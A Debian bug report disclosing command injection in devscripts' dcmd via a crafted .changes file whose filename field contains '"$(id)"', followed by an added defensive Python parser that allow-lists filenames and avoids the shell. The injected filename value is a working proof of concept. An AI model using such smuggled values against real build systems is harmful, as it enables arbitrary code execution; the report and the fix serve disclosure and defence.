Package: devscripts
Version: 2.26.9
Severity: critical
File: /usr/bin/dcmd
hello!
When I read through #1138907 the error message caught my attention and I crafted
a .changes file that executes arbitrary code when processed:
--- 8< ---
Format: 1.8
Files:
ffffffffffffffffffffffffffffffff 1337 abc optional "$(id)"
--- >8 ---
$ /usr/bin/dcmd echo hax.changes
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo),112(sbuild) hax.changes
This creates an undocumented execution path that may cross security boundaries
on Debian build server infrastructure.
This bug is related to #1138923.
Sincerely,
kpcyrd
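A defensive counterpart to the reproducer above, as an added example that is not code from devscripts or from the reporter: a small Python parser for the Files: field that validates each filename against an allow-list and passes the names to a command as an argument vector rather than through a shell, so the "$(id)" entry is rejected, and would be passed literally even if it were not. The function names, the allow-list pattern and both sample .changes texts are assumptions constructed for this example.

```python
import re
import subprocess

# Constructed inputs modelled on the reproducer in the bug report; not real uploads.
HOSTILE_CHANGES = (
    "Format: 1.8\n"
    "Files:\n"
    " " + "f" * 32 + ' 1337 abc optional "$(id)"\n'
)

BENIGN_CHANGES = (
    "Format: 1.8\n"
    "Files:\n"
    " " + "a" * 32 + " 2048 devel optional hax_1.0-1.dsc\n"
    " " + "b" * 32 + " 4096 devel optional hax_1.0-1.tar.xz\n"
)

# Assumed allow-list: a filename may contain only letters, digits and the
# punctuation seen in Debian package names. No whitespace, quotes, '$', '(',
# '`' or '/', so shell metacharacters and path separators never get through.
MD5_RE = re.compile(r"[0-9a-f]{32}")
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9+._~-]*")


def parse_files_stanza(text):
    """Parse the Files: field of a .changes file into
    (md5, size, section, priority, filename) tuples without handing any of
    the text to a shell. Raises ValueError for malformed entries or for a
    filename outside the allow-list."""
    entries = []
    in_files = False
    for raw in text.splitlines():
        if not in_files:
            in_files = raw.startswith("Files:")
            continue
        if not raw[:1].isspace():          # first non-indented line ends the field
            in_files = False
            continue
        fields = raw.split()
        if len(fields) != 5:
            raise ValueError(f"malformed Files entry: {raw.strip()!r}")
        md5, size, section, priority, name = fields
        if not MD5_RE.fullmatch(md5):
            raise ValueError(f"bad md5 in Files entry: {md5!r}")
        if not size.isdigit():
            raise ValueError(f"bad size in Files entry: {size!r}")
        if not SAFE_NAME_RE.fullmatch(name):
            raise ValueError(f"rejected unsafe filename: {name!r}")
        entries.append((md5, int(size), section, priority, name))
    if not entries:
        raise ValueError("no Files entries found")
    return entries


def classify(text):
    """Returns ('accepted', [filenames]) or ('rejected', reason) so a caller
    can log the rejection and stop instead of acting on the file."""
    try:
        return "accepted", [entry[4] for entry in parse_files_stanza(text)]
    except ValueError as exc:
        return "rejected", str(exc)


def run_on_files(argv, text):
    """Run argv with the referenced filenames appended as separate arguments.
    The list form of subprocess.run never invokes /bin/sh, so a name such as
    "$(id)" would reach the command as a literal string, not be expanded."""
    names = [entry[4] for entry in parse_files_stanza(text)]
    proc = subprocess.run(list(argv) + names, capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_CHANGES), ("hostile", HOSTILE_CHANGES)):
        print(label, classify(doc))
```

The two controls are independent: the allow-list stops unexpected names at parse time, and the argument-vector call removes the shell from the path entirely, so a name that slipped past the allow-list would still not be evaluated.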